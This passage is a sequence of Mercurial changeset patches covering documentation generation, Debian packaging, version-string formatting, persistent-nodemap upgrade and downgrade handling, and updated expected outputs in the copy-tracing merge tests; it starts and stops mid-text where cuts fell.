tostrip, node, topic) # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1613156643 28800 # Fri Feb 12 11:04:03 2021 -0800 # Node ID 921e1253c8ba97827e68fd98d2791978324d7dc6 # Parent cd91543431604b0fcaa601a3aa8b3c862f0d7c41 gendoc: support defaults on customopts a bit better Without this, a customopt will very likely render like this: ``` -foo does foo (default: <hgext.myextension.MyOpt object at 0x7f31...>) ``` I copied this logic from how this is handled in mercurial/help.py. Differential Revision: https://phab.mercurial-scm.org/D9988 diff --git a/doc/gendoc.py b/doc/gendoc.py --- a/doc/gendoc.py +++ b/doc/gendoc.py @@ -31,6 +31,7 @@ commands, encoding, extensions, + fancyopts, help, minirst, pycompat, @@ -86,6 +87,8 @@ if b'\n' in desc: # only remove line breaks and indentation desc = b' '.join(l.lstrip() for l in desc.split(b'\n')) + if isinstance(default, fancyopts.customopt): + default = default.getdefaultvalue() if default: default = stringutil.forcebytestr(default) desc += _(b" (default: %s)") % default # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1613156816 28800 # Fri Feb 12 11:06:56 2021 -0800 # Node ID eb36f7a71291de88e0ee12cebdd574d026fce2dc # Parent 921e1253c8ba97827e68fd98d2791978324d7dc6 gendoc: add support for loading extensions from config settings We manage our installation and ship some extensions, enabled by default for our users, that are in hgext3rd or other directories not scanned by this tool by default. We want to generate docs during the build process, and having those docs include the extensions that users don't have to manually enable is desirable. This is *not* desirable for the normal build process, however, and should never be enabled by default. Differential Revision: https://phab.mercurial-scm.org/D9989 diff --git a/doc/gendoc.py b/doc/gendoc.py --- a/doc/gendoc.py +++ b/doc/gendoc.py @@ -330,6 +330,11 @@ doc = encoding.strtolocal(sys.argv[1]) ui = uimod.ui.load() + # Trigger extensions to load. This is disabled by default because it uses + # the current user's configuration, which is often not what is wanted. + if encoding.environ.get(b'GENDOC_LOAD_CONFIGURED_EXTENSIONS', b'0') != b'0': + extensions.loadall(ui) + if doc == b'hg.1.gendoc': showdoc(ui) else: # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1613165223 28800 # Fri Feb 12 13:27:03 2021 -0800 # Node ID 85ec89c47a0413a0cbd54062527e33555f45dec3 # Parent eb36f7a71291de88e0ee12cebdd574d026fce2dc gendoc: use an empty comment so aliases are separated from previous elements For commands like `hg bookmarks`, where there's no `[+] marked option can be specified multiple times`, this causes the final option in the option list to not be the parent of the aliases definition. The aliases section is thus marked as a blockquote like on commands that do have text separating the option list and the aliases definition. Differential Revision: https://phab.mercurial-scm.org/D9990 diff --git a/doc/gendoc.py b/doc/gendoc.py --- a/doc/gendoc.py +++ b/doc/gendoc.py @@ -317,7 +317,12 @@ ui.write(b"\n") # aliases if d[b'aliases']: - ui.write(_(b" aliases: %s\n\n") % b" ".join(d[b'aliases'])) + # Note the empty comment, this is required to separate this + # (which should be a blockquote) from any preceding things (such + # as a definition list). + ui.write( + _(b"..\n\n aliases: %s\n\n") % b" ".join(d[b'aliases']) + ) def allextensionnames(): # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613120028 -3600 # Fri Feb 12 09:53:48 2021 +0100 # Node ID 83ac7c91e17283c1fe9d455793837bbef8bc4ccd # Parent 85ec89c47a0413a0cbd54062527e33555f45dec3 bundle2: pass the operation source down to the changegroup This is currently not used by anything in core (and redundant with the url), the real source information is much more useful. This is going to be used in sidedata exchange patches coming soon. Differential Revision: https://phab.mercurial-scm.org/D9986 diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -2001,7 +2001,7 @@ op, cg, tr, - b'bundle2', + op.source, b'bundle2', expectedtotal=nbchangesets, **extrakwargs @@ -2083,7 +2083,7 @@ raise error.Abort( _(b'%s: not a bundle version 1.0') % util.hidepassword(raw_url) ) - ret = _processchangegroup(op, cg, tr, b'bundle2', b'bundle2') + ret = _processchangegroup(op, cg, tr, op.source, b'bundle2') if op.reply is not None: # This is definitely not the final form of this # return. But one need to start somewhere. # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1613071373 28800 # Thu Feb 11 11:22:53 2021 -0800 # Node ID c82d6363bc9e3053df3ae42ab400d86afbcd2cd1 # Parent 83ac7c91e17283c1fe9d455793837bbef8bc4ccd packaging: add Provides: python3-mercurial and Homepage to debian package There are other packages that depend on python3-mercurial, like debian's mercurial-git, so we should mark ourselves as providing it. I compared the control file we generate to the one that the debian maintainers generate, and noticed several differences: - the Homepage bit. I included this, because why not - a more robust Suggests list that includes a graphical merge tool - a more robust Breaks list - debian's Recommends openssh-client, we only Recommends ca-certificates - a split into `mercurial` and `mercurial-common` (and possibly others?) - a slightly different description Differential Revision: https://phab.mercurial-scm.org/D9983 diff --git a/contrib/packaging/debian/control b/contrib/packaging/debian/control --- a/contrib/packaging/debian/control +++ b/contrib/packaging/debian/control @@ -25,7 +25,9 @@ Suggests: wish Replaces: mercurial-common Breaks: mercurial-common +Provides: python3-mercurial Architecture: any +Homepage: https://www.mercurial-scm.org/ Description: fast, easy to use, distributed revision control tool. Mercurial is a fast, lightweight Source Control Management system designed for efficient handling of very large distributed projects. # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614112012 28800 # Tue Feb 23 12:26:52 2021 -0800 # Node ID 359bdd8fc60abf8c55cd3c3b6b67208eb76c4f2e # Parent c82d6363bc9e3053df3ae42ab400d86afbcd2cd1 build: make version from .hg_archival.txt consistent with that from .hg/ D9955 changed the version format to replace "-" by "." and to add "hg" before the number representing the distance from the latest tag. However, it missed the "hg" string and added an extra "." to the version string we produce when there's a `.hg_archival.txt`. This patch makes it consistent. Differential Revision: https://phab.mercurial-scm.org/D10060 diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -431,12 +431,12 @@ elif 'latesttag' in kw: if 'changessincelatesttag' in kw: version = ( - '%(latesttag)s+.%(changessincelatesttag)s.%(node).12s' % kw + '%(latesttag)s+hg%(changessincelatesttag)s.%(node).12s' % kw ) else: - version = '%(latesttag)s+.%(latesttagdistance)s.%(node).12s' % kw + version = '%(latesttag)s+hg%(latesttagdistance)s.%(node).12s' % kw else: - version = '0+' + kw.get('node', '')[:12] + version = '0+hg' + kw.get('node', '')[:12] if version: versionb = version # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1614112181 28800 # Tue Feb 23 12:29:41 2021 -0800 # Node ID e3f23814bac7324a457f5b231de3c8234c62503a # Parent 359bdd8fc60abf8c55cd3c3b6b67208eb76c4f2e windows: fix parsing of version number to match format from D9955 Differential Revision: https://phab.mercurial-scm.org/D10061 diff --git a/contrib/packaging/hgpackaging/util.py b/contrib/packaging/hgpackaging/util.py --- a/contrib/packaging/hgpackaging/util.py +++ b/contrib/packaging/hgpackaging/util.py @@ -161,10 +161,10 @@ >>> normalize_windows_version("5.3rc1") '5.3.0.1' - >>> normalize_windows_version("5.3rc1+2-abcdef") + >>> normalize_windows_version("5.3rc1+hg2.abcdef") '5.3.0.1' - >>> normalize_windows_version("5.3+2-abcdef") + >>> normalize_windows_version("5.3+hg2.abcdef") '5.3.0.2' """ if '+' in version: @@ -188,8 +188,8 @@ if rc is not None: versions.append(rc) elif extra: - # <commit count>-<hash>+<date> - versions.append(int(extra.split('-')[0])) + # hg<commit count>.<hash>+<date> + versions.append(int(extra.split('.')[0][2:])) return '.'.join('%d' % x for x in versions[0:4]) # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1613382200 -19800 # Mon Feb 15 15:13:20 2021 +0530 # Node ID 636853347e14129738393fd0b88e0c769fc3076f # Parent e3f23814bac7324a457f5b231de3c8234c62503a upgrade: write nodemap for manifests too In 98e39f04d60e I assumed that writing nodemap for manifests was not desirable and stopped writing it during upgrade. However in recent discussion with Pierre-Yves, I learnt that that's not true. Differential Revision: https://phab.mercurial-scm.org/D9991 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -468,6 +468,13 @@ unfi = srcrepo.unfiltered() cl = unfi.changelog nodemap.persist_nodemap(tr, cl, force=True) + # we want to directly operate on the underlying revlog to force + # create a nodemap file. This is fine since this is upgrade code + # and it heavily relies on repository being revlog based + # hence accessing private attributes can be justified + nodemap.persist_nodemap( + tr, unfi.manifestlog._rootstore._revlog, force=True + ) scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) else: with dstrepo.transaction(b'upgrade') as tr: diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -641,6 +641,8 @@ $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) 00changelog.n + 00manifest-*.nd (glob) + 00manifest.n $ hg debugnodemap --metadata uid: * (glob) # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1612957114 -19800 # Wed Feb 10 17:08:34 2021 +0530 # Node ID 67b5fafd3a464b1876fb5bb3b87b200beb7d8cdb # Parent 636853347e14129738393fd0b88e0c769fc3076f upgrade: speed up when we have only nodemap to downgrade Similar to what we do on upgrade, if we have only persistent-nodemap to downgrade we will just delete the nodemap files and update repository requirements instead of processing all the revlogs. After downgrade, we are left with unrequired docket and transaction files which seems fine but can work on deleting them if someone feels we should. Differential Revision: https://phab.mercurial-scm.org/D9992 diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -128,6 +128,14 @@ notr._postclose[k](None) +def delete_nodemap(tr, repo, revlog): + """ Delete nodemap data on disk for a given revlog""" + if revlog.nodemap_file is None: + msg = "calling persist nodemap on a revlog without the feature enabled" + raise error.ProgrammingError(msg) + repo.svfs.unlink(revlog.nodemap_file) + + def persist_nodemap(tr, revlog, pending=False, force=False): """Write nodemap data on disk for a given revlog""" if getattr(revlog, 'filteredrevs', ()): diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -476,6 +476,27 @@ tr, unfi.manifestlog._rootstore._revlog, force=True ) scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + elif ( + len(upgrade_op.removed_actions) == 1 + and [ + x + for x in upgrade_op.removed_actions + if x.name == b'persistent-nodemap' + ] + and not upgrade_op.upgrade_actions + ): + ui.status( + _(b'downgrading repository to not use persistent nodemap feature\n') + ) + with srcrepo.transaction(b'upgrade') as tr: + unfi = srcrepo.unfiltered() + cl = unfi.changelog + nodemap.delete_nodemap(tr, srcrepo, cl) + # check comment 20 lines above for accessing private attributes + nodemap.delete_nodemap( + tr, srcrepo, unfi.manifestlog._rootstore._revlog + ) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) else: with dstrepo.transaction(b'upgrade') as tr: _clonerevlogs( diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -581,7 +581,7 @@ plain-cl-delta: yes yes yes compression: zlib zlib zlib compression-level: default default default - $ hg debugupgraderepo --run --no-backup --quiet + $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements @@ -593,8 +593,17 @@ - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + downgrading repository to not use persistent nodemap feature + removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob) $ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' - [1] + 00changelog-*.nd (glob) + 00manifest-*.nd (glob) + undo.backup.00changelog.n + undo.backup.00manifest.n $ hg debugnodemap --metadata @@ -643,6 +652,8 @@ 00changelog.n 00manifest-*.nd (glob) 00manifest.n + undo.backup.00changelog.n + undo.backup.00manifest.n $ hg debugnodemap --metadata uid: * (glob) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1607606736 -3600 # Thu Dec 10 14:25:36 2020 +0100 # Node ID 018d622e814df4fbcf3de589b7195788f5c226c3 # Parent 67b5fafd3a464b1876fb5bb3b87b200beb7d8cdb test-copies: reinstall initial identical (empty) files for chained copied This effectively back out changeset deeb215be337. Changeset deeb215be33 does not really include a justification for its change and make mes uncomfortable. I have been thinking about it and they are two options: - either having empty/full files does not make a difference, and deeb215be337 is a gratuitous changes. - either having empty/full files do make a difference and deeb215be33 silently change the test coverage. In such situation if we want the "not empty" case to be tested, we should add new cases to cover them In practice, we know that the "file content did not change, but merge still need to create a new filenode" case exists (for example if merging result in similar content but both parent of the file need to be recorded), and that such case are easy to miss/mess-up in the tests. Having all the file using the same (empty) content was done on purpose to increase the coverage of such corner case. As a result I am reinstalling the previous test situation. To increase the coverage of some case involving content-merge in test-copies-chain-merge.t, we will add a new, dedicated, cases later in this series, once various cleanup and test improvement have been set in place. This changeset starts with reinstalling the previous situation as (1) it is more fragile, so I am more confided getting it back in the initial situation, (2) I have specific test further down the line that are base on these one. The next changeset will slightly alter the test to use non-empty files for these tests (with identical content). It should help to make the initial intent "merge file with identical content" clearer. I am still using a two steps (backout, then change content) approach to facilitate careful validation of the output change. Doing so has a large impact on the output of the "copy info in changeset extra" variant added in 5e72827dae1e (2 changesets after deeb215be33). It seems to highlight various breakage when merge without content change are involved, this is a good example of why we want to explicitly test theses cases. Because the different -do- matters a lot. Fixing the "copy info in changeset extra" is not a priority here. Because (1) this changeset does not break anything, it only highlight that they were always broken. (2) the only people using "copy info in changeset extra" do not have merge. Differential Revision: https://phab.mercurial-scm.org/D9587 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -50,9 +50,7 @@ Add some linear rename initialy - $ echo a > a - $ echo b > b - $ echo h > h + $ touch a b h $ hg ci -Am 'i-0 initial commit: a b h' adding a adding b @@ -302,16 +300,17 @@ $ hg up 'desc("a-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ hg merge 'desc("e-2")' --tool :union - merging f - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("e-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) $ hg ci -m 'mAEm-0 simple merge - one way' $ hg up 'desc("e-2")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 'desc("a-2")' --tool :union - merging f - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("a-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) $ hg ci -m 'mEAm-0 simple merge - the other way' created new head @@ -349,15 +348,16 @@ $ hg commit -m "f-2: rename i -> d" $ hg debugindex d rev linkrev nodeid p1 p2 - 0 2 169be882533b 000000000000 000000000000 (no-changeset !) - 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !) + 0 2 01c2f5eabdc4 000000000000 000000000000 (no-changeset !) + 0 2 b80de5d13875 000000000000 000000000000 (changeset !) 1 8 b004912a8510 000000000000 000000000000 - 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !) - 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !) + 2 22 c72365ee036f 000000000000 000000000000 (no-changeset !) $ hg up 'desc("b-1")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ hg merge 'desc("f-2")' - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) $ hg ci -m 'mBFm-0 simple merge - one way' $ hg up 'desc("f-2")' @@ -394,7 +394,8 @@ consider history and rename on both branch of the merge. $ hg up 'desc("i-2")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ echo "some update" >> d $ hg commit -m "g-1: update d" created new head @@ -448,16 +449,19 @@ $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("g-1")' --tool :union - merging d - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + merging d (no-changeset !) + 0 files updated, 1 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) $ hg ci -m 'mFGm-0 simple merge - one way' created new head $ hg up 'desc("g-1")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ hg merge 'desc("f-2")' --tool :union - merging d - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + merging d (no-changeset !) + 0 files updated, 1 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) $ hg ci -m 'mGFm-0 simple merge - the other way' created new head @@ -1120,15 +1124,15 @@ $ hg manifest --debug --rev 'desc("d-2")' | grep '644 d' b004912a8510032a0350a74daa2803dadfb00e12 644 d $ hg manifest --debug --rev 'desc("b-1")' | grep '644 d' - 169be882533bc917905d46c0c951aa9a1e288dcf 644 d (no-changeset !) - b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 d (changeset !) + 01c2f5eabdc4ce2bdee42b5f86311955e6c8f573 644 d (no-changeset !) + b80de5d138758541c5f05265ad144ab9fa86d1db 644 d (changeset !) $ hg debugindex d | head -n 4 rev linkrev nodeid p1 p2 - 0 2 169be882533b 000000000000 000000000000 (no-changeset !) - 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !) + 0 2 01c2f5eabdc4 000000000000 000000000000 (no-changeset !) + 0 2 b80de5d13875 000000000000 000000000000 (changeset !) 1 8 b004912a8510 000000000000 000000000000 - 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !) - 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !) + 2 22 c72365ee036f 000000000000 000000000000 (no-changeset !) + 2 25 68d5bca9df05 b80de5d13875 000000000000 (changeset !) Log output should not include a merge commit as it did not happen @@ -1179,34 +1183,30 @@ #if no-changeset $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - c39c6083dad048d5138618a46f123e2f397f4f18 644 f + eb806e34ef6be4c264effd5933d31004ad15a793 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - a9a8bc3860c9d8fa5f2f7e6ea8d40498322737fd 644 f + eb806e34ef6be4c264effd5933d31004ad15a793 644 f $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' - 263ea25e220aaeb7b9bac551c702037849aa75e8 644 f + 0dd616bc7ab1a111921d95d76f69cda5c2ac539c 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - 71b9b7e73d973572ade6dd765477fcee6890e8b1 644 f + 6da5a2eecb9c833f830b67a4972366d49a9a142c 644 f $ hg debugindex f rev linkrev nodeid p1 p2 - 0 4 263ea25e220a 000000000000 000000000000 - 1 10 71b9b7e73d97 000000000000 000000000000 - 2 19 c39c6083dad0 263ea25e220a 71b9b7e73d97 - 3 20 a9a8bc3860c9 71b9b7e73d97 263ea25e220a + 0 4 0dd616bc7ab1 000000000000 000000000000 + 1 10 6da5a2eecb9c 000000000000 000000000000 + 2 19 eb806e34ef6b 0dd616bc7ab1 6da5a2eecb9c #else $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - 498e8799f49f9da1ca06bb2d6d4accf165c5b572 644 f + b80de5d138758541c5f05265ad144ab9fa86d1db 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - c5b506a7118667a38a9c9348a1f63b679e382f57 644 f + b80de5d138758541c5f05265ad144ab9fa86d1db 644 f $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' - b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 f + b80de5d138758541c5f05265ad144ab9fa86d1db 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - 1e88685f5ddec574a34c70af492f95b6debc8741 644 f + b80de5d138758541c5f05265ad144ab9fa86d1db 644 f $ hg debugindex f rev linkrev nodeid p1 p2 - 0 4 b789fdd96dc2 000000000000 000000000000 - 1 10 1e88685f5dde 000000000000 000000000000 - 2 19 498e8799f49f b789fdd96dc2 1e88685f5dde - 3 20 c5b506a71186 1e88685f5dde b789fdd96dc2 + 0 4 b80de5d13875 000000000000 000000000000 #endif # Here the filelog based implementation is not looking at the rename @@ -1214,20 +1214,20 @@ # based on works fine. We have different output. $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAEm-0")' - M f - b (no-filelog !) + M f (no-changeset !) + b (no-filelog no-changeset !) R b $ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEAm-0")' - M f - b (no-filelog !) + M f (no-changeset !) + b (no-filelog no-changeset !) R b $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAEm-0")' - M f - d (no-filelog !) + M f (no-changeset !) + d (no-filelog no-changeset !) R d $ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEAm-0")' - M f - d (no-filelog !) + M f (no-changeset !) + d (no-filelog no-changeset !) R d $ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")' A f @@ -1312,26 +1312,26 @@ R a R h $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBFm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBFm-0")' M b $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBFm-0")' M b - M d - i (no-filelog !) + M d (no-changeset !) + i (no-filelog no-changeset !) R i $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFBm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFBm-0")' M b $ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFBm-0")' M b - M d - i (no-filelog !) + M d (no-changeset !) + i (no-filelog no-changeset !) R i #if no-changeset @@ -1345,7 +1345,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mBFm-0")' d - o 22 f-2: rename i -> d + o 2 i-2: c -move-> d | ~ #endif @@ -1361,7 +1361,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFBm-0")' d - o 22 f-2: rename i -> d + o 2 i-2: c -move-> d | ~ #endif @@ -1509,15 +1509,15 @@ Details on this hash ordering pick: $ hg manifest --debug 'desc("g-1")' | egrep 'd$' - f2b277c39e0d2bbac99d8aae075c0d8b5304d266 644 d (no-changeset !) - 4ff57b4e8dceedb487e70e6965ea188a7c042cca 644 d (changeset !) + 7bded9d9da1f7bf9bf7cbfb24fe1e6ccf68ec440 644 d (no-changeset !) + 68d5bca9df0577b6bc2ea30ca724e13ead60da81 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("g-1")' d A d a (no-changeset no-compatibility !) $ hg manifest --debug 'desc("f-2")' | egrep 'd$' - 4a067cf8965d1bfff130057ade26b44f580231be 644 d (no-changeset !) - fe6f8b4f507fe3eb524c527192a84920a4288dac 644 d (changeset !) + c72365ee036fca4fb27fd745459bfb6ea1ac6993 644 d (no-changeset !) + b80de5d138758541c5f05265ad144ab9fa86d1db 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("f-2")' d A d h (no-changeset no-compatibility !) @@ -1526,13 +1526,14 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFGm-0")' A d - h + h (no-filelog !) + a (filelog !) R a R h $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGFm-0")' A d - a (no-filelog !) - h (filelog !) + a (no-changeset !) + h (changeset !) R a R h $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFGm-0")' @@ -1548,12 +1549,12 @@ i (no-filelog !) R i $ hg status --copies --rev 'desc("g-1")' --rev 'desc("mFGm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h $ hg status --copies --rev 'desc("g-1")' --rev 'desc("mGFm-0")' - M d - h (no-filelog !) + M d (no-changeset !) + h (no-filelog no-changeset !) R h #if no-changeset @@ -1575,12 +1576,8 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mFGm-0")' d - o 28 mFGm-0 simple merge - one way - |\ - | o 25 g-1: update d - | | - o | 22 f-2: rename i -> d - |/ + o 25 g-1: update d + | o 2 i-2: c -move-> d | ~ @@ -1605,12 +1602,8 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mGFm-0")' d - o 29 mGFm-0 simple merge - the other way - |\ - | o 25 g-1: update d - | | - o | 22 f-2: rename i -> d - |/ + o 25 g-1: update d + | o 2 i-2: c -move-> d | ~ # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1614016125 -3600 # Mon Feb 22 18:48:45 2021 +0100 # Node ID d46885119f902efc5409d687fcf1f38043c265b4 # Parent 018d622e814df4fbcf3de589b7195788f5c226c3 test-copies: don't use empty file for "same content" cases For main case (using filelog or sidedata), this lead to the following hash change. Changesets: - 01c2f5eabdc4ce2bdee42b5f86311955e6c8f573 → 319179230cc87769ab3a861ebffe7a534ebb3d85 - 01c2f5eabdc4 → 319179230cc8 - c72365ee036fca4fb27fd745459bfb6ea1ac6993 → 6cbc9c2b7b391dd738603173717c601648d3735f - c72365ee036f → 6cbc9c2b7b39 File revision for `f`: - 0dd616bc7ab1a111921d95d76f69cda5c2ac539c → cedeacc5bf5d9b9be4d7f8394d33a5349bb29c6e - 0dd616bc7ab1 → cedeacc5bf5d - eb806e34ef6be4c264effd5933d31004ad15a793 → ffb76cd765422a18759a335d8a81fa2bd455be6b - eb806e34ef6b → ffb76cd76542 - 6da5a2eecb9c833f830b67a4972366d49a9a142c → 08d1ff5926fbd0285cdeb044cbe8ab651687e86a - 6da5a2eecb9c → 08d1ff5926fb File revision for `d`: - 7bded9d9da1f7bf9bf7cbfb24fe1e6ccf68ec440 → ba177bbb45ea930ee48469a55d40224537bd57a9 For the "extra in changeset" case we get the following change for file `d`: - 68d5bca9df0577b6bc2ea30ca724e13ead60da81 → b894de5c94aadcb4894ea7c358389819c27fbcce - 68d5bca9df05 → b894de5c94aa - b80de5d138758541c5f05265ad144ab9fa86d1db → 56647659eff080e06e45c18ea9e848836dadea71 - b80de5d13875 → 56647659eff0 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -45,12 +45,23 @@ #endif + $ cat > same-content.txt << EOF + > Here is some content that will be the same accros multiple file. + > + > This is done on purpose so that we end up in some merge situation, were the + > resulting content is the same as in the parent(s), but a new filenodes still + > need to be created to record some file history information (especially + > about copies). + > EOF + $ hg init repo-chain $ cd repo-chain Add some linear rename initialy - $ touch a b h + $ cp ../same-content.txt a + $ cp ../same-content.txt b + $ cp ../same-content.txt h $ hg ci -Am 'i-0 initial commit: a b h' adding a adding b @@ -348,10 +359,10 @@ $ hg commit -m "f-2: rename i -> d" $ hg debugindex d rev linkrev nodeid p1 p2 - 0 2 01c2f5eabdc4 000000000000 000000000000 (no-changeset !) - 0 2 b80de5d13875 000000000000 000000000000 (changeset !) + 0 2 d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 2 ae258f702dfe 000000000000 000000000000 (changeset !) 1 8 b004912a8510 000000000000 000000000000 - 2 22 c72365ee036f 000000000000 000000000000 (no-changeset !) + 2 22 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) $ hg up 'desc("b-1")' 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) @@ -1124,15 +1135,15 @@ $ hg manifest --debug --rev 'desc("d-2")' | grep '644 d' b004912a8510032a0350a74daa2803dadfb00e12 644 d $ hg manifest --debug --rev 'desc("b-1")' | grep '644 d' - 01c2f5eabdc4ce2bdee42b5f86311955e6c8f573 644 d (no-changeset !) - b80de5d138758541c5f05265ad144ab9fa86d1db 644 d (changeset !) + d8252ab2e760b0d4e5288fd44cbd15a0fa567e16 644 d (no-changeset !) + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !) $ hg debugindex d | head -n 4 rev linkrev nodeid p1 p2 - 0 2 01c2f5eabdc4 000000000000 000000000000 (no-changeset !) - 0 2 b80de5d13875 000000000000 000000000000 (changeset !) + 0 2 d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 2 ae258f702dfe 000000000000 000000000000 (changeset 